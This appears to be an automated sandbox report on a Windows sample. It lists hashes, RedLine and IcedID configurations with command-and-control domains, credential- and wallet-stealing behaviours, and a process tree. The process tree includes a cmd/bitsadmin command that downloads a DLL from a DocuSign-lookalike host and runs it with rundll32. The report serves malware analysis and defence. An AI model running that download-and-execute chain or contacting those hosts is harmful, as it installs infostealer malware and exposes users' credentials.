Resubmissions
10-05-2021 11:09
210510-cdf8nml7an 10Analysis
-
max time kernel
136s -
max time network
143s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
10-05-2021 11:09
Static task
static1
Behavioral task
behavioral1
Sample
e95d92772e18190dbde834744c74aa2ab7fda3b01e1ca839fabb8a4285b4e148.exe
Resource
win7v20210410
General
-
Target
e95d92772e18190dbde834744c74aa2ab7fda3b01e1ca839fabb8a4285b4e148.exe
-
Size
1.6MB
-
MD5
16a11f50f6925fca61040f2e0a834b89
-
SHA1
4179ea5b096750082e177dddedf3a46f1576ef91
-
SHA256
e95d92772e18190dbde834744c74aa2ab7fda3b01e1ca839fabb8a4285b4e148
-
SHA512
309b46e3e09e77a96a3ecc06a06a62fc7111e15383aefb8eed8c9be11c700774749d55f6dd7e2fb172bc74525a52c888e9aac6c49b217e4a0bc3b247676a075c
Malware Config
Extracted
redline
zastaredan.xyz:80
Extracted
icedid
687839456
icouldmakeyoubelieve.top
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 3 IoCs
Processes:
resource yara_rule behavioral2/memory/2132-124-0x0000000000400000-0x000000000041C000-memory.dmp family_redline behavioral2/memory/2132-125-0x00000000004163BA-mapping.dmp family_redline behavioral2/memory/2132-133-0x0000000004FB0000-0x00000000055B6000-memory.dmp family_redline -
Blocklisted process makes network request 2 IoCs
Processes:
rundll32.exeflow pid process 20 3344 rundll32.exe 22 3344 rundll32.exe -
Downloads MZ/PE file
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Suspicious use of SetThreadContext 1 IoCs
Processes:
e95d92772e18190dbde834744c74aa2ab7fda3b01e1ca839fabb8a4285b4e148.exedescription pid process target process PID 1400 set thread context of 2132 1400 e95d92772e18190dbde834744c74aa2ab7fda3b01e1ca839fabb8a4285b4e148.exe e95d92772e18190dbde834744c74aa2ab7fda3b01e1ca839fabb8a4285b4e148.exe -
Download via BitsAdmin 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
e95d92772e18190dbde834744c74aa2ab7fda3b01e1ca839fabb8a4285b4e148.exerundll32.exepid process 2132 e95d92772e18190dbde834744c74aa2ab7fda3b01e1ca839fabb8a4285b4e148.exe 2132 e95d92772e18190dbde834744c74aa2ab7fda3b01e1ca839fabb8a4285b4e148.exe 3344 rundll32.exe 3344 rundll32.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
e95d92772e18190dbde834744c74aa2ab7fda3b01e1ca839fabb8a4285b4e148.exedescription pid process Token: SeDebugPrivilege 2132 e95d92772e18190dbde834744c74aa2ab7fda3b01e1ca839fabb8a4285b4e148.exe -
Suspicious use of WriteProcessMemory 19 IoCs
Processes:
e95d92772e18190dbde834744c74aa2ab7fda3b01e1ca839fabb8a4285b4e148.exee95d92772e18190dbde834744c74aa2ab7fda3b01e1ca839fabb8a4285b4e148.execmd.exerundll32.exedescription pid process target process PID 1400 wrote to memory of 2132 1400 e95d92772e18190dbde834744c74aa2ab7fda3b01e1ca839fabb8a4285b4e148.exe e95d92772e18190dbde834744c74aa2ab7fda3b01e1ca839fabb8a4285b4e148.exe PID 1400 wrote to memory of 2132 1400 e95d92772e18190dbde834744c74aa2ab7fda3b01e1ca839fabb8a4285b4e148.exe e95d92772e18190dbde834744c74aa2ab7fda3b01e1ca839fabb8a4285b4e148.exe PID 1400 wrote to memory of 2132 1400 e95d92772e18190dbde834744c74aa2ab7fda3b01e1ca839fabb8a4285b4e148.exe e95d92772e18190dbde834744c74aa2ab7fda3b01e1ca839fabb8a4285b4e148.exe PID 1400 wrote to memory of 2132 1400 e95d92772e18190dbde834744c74aa2ab7fda3b01e1ca839fabb8a4285b4e148.exe e95d92772e18190dbde834744c74aa2ab7fda3b01e1ca839fabb8a4285b4e148.exe PID 1400 wrote to memory of 2132 1400 e95d92772e18190dbde834744c74aa2ab7fda3b01e1ca839fabb8a4285b4e148.exe e95d92772e18190dbde834744c74aa2ab7fda3b01e1ca839fabb8a4285b4e148.exe PID 1400 wrote to memory of 2132 1400 e95d92772e18190dbde834744c74aa2ab7fda3b01e1ca839fabb8a4285b4e148.exe e95d92772e18190dbde834744c74aa2ab7fda3b01e1ca839fabb8a4285b4e148.exe PID 1400 wrote to memory of 2132 1400 e95d92772e18190dbde834744c74aa2ab7fda3b01e1ca839fabb8a4285b4e148.exe e95d92772e18190dbde834744c74aa2ab7fda3b01e1ca839fabb8a4285b4e148.exe PID 1400 wrote to memory of 2132 1400 e95d92772e18190dbde834744c74aa2ab7fda3b01e1ca839fabb8a4285b4e148.exe e95d92772e18190dbde834744c74aa2ab7fda3b01e1ca839fabb8a4285b4e148.exe PID 2132 wrote to memory of 2908 2132 e95d92772e18190dbde834744c74aa2ab7fda3b01e1ca839fabb8a4285b4e148.exe cmd.exe PID 2132 wrote to memory of 2908 2132 e95d92772e18190dbde834744c74aa2ab7fda3b01e1ca839fabb8a4285b4e148.exe cmd.exe PID 2132 wrote to memory of 2908 2132 e95d92772e18190dbde834744c74aa2ab7fda3b01e1ca839fabb8a4285b4e148.exe cmd.exe PID 2908 wrote to memory of 1372 2908 cmd.exe bitsadmin.exe PID 2908 wrote to memory of 1372 2908 cmd.exe bitsadmin.exe PID 2908 wrote to memory of 1372 2908 cmd.exe bitsadmin.exe PID 2908 wrote to memory of 636 2908 cmd.exe rundll32.exe PID 2908 wrote to memory of 636 2908 cmd.exe rundll32.exe PID 2908 wrote to memory of 636 2908 cmd.exe rundll32.exe PID 636 wrote to memory of 3344 636 rundll32.exe rundll32.exe PID 636 wrote to memory of 3344 636 rundll32.exe rundll32.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\e95d92772e18190dbde834744c74aa2ab7fda3b01e1ca839fabb8a4285b4e148.exe"C:\Users\Admin\AppData\Local\Temp\e95d92772e18190dbde834744c74aa2ab7fda3b01e1ca839fabb8a4285b4e148.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1400 -
C:\Users\Admin\AppData\Local\Temp\e95d92772e18190dbde834744c74aa2ab7fda3b01e1ca839fabb8a4285b4e148.exe"C:\Users\Admin\AppData\Local\Temp\e95d92772e18190dbde834744c74aa2ab7fda3b01e1ca839fabb8a4285b4e148.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2132 -
C:\Windows\SysWOW64\cmd.exe"cmd" /C bitsadmin /transfer debjob /download /priority HIGH https://securepro.docusign.peacearoo.com/upd/cert.dll %tmp%\name.dll && rundll32 %tmp%\name.dll,PluginInit3⤵
- Suspicious use of WriteProcessMemory
PID:2908 -
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /transfer debjob /download /priority HIGH https://securepro.docusign.peacearoo.com/upd/cert.dll C:\Users\Admin\AppData\Local\Temp\name.dll4⤵
- Download via BitsAdmin
PID:1372
-
-
C:\Windows\SysWOW64\rundll32.exerundll32 C:\Users\Admin\AppData\Local\Temp\name.dll,PluginInit4⤵
- Suspicious use of WriteProcessMemory
PID:636 -
C:\Windows\system32\rundll32.exerundll32 C:\Users\Admin\AppData\Local\Temp\name.dll,PluginInit5⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
PID:3344
-
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\e95d92772e18190dbde834744c74aa2ab7fda3b01e1ca839fabb8a4285b4e148.exe.log
MD5e66606ac29605c55484b2e0f9ee4a447
SHA14e226b60592e1addafae55034137ea8d5d0fb113
SHA25651ea67e4068c37a73d878dfda2e9475e7ecb01ea5c422b13b71459db2d0942e9
SHA512038139d200ba48d82a462dee57bab1dd0ca6d8180e20aef72b5d079c6010ce8d1041fbb49084e54deb205bcb9bf7ae92c6b6a0256908b48d08e5043e2148799b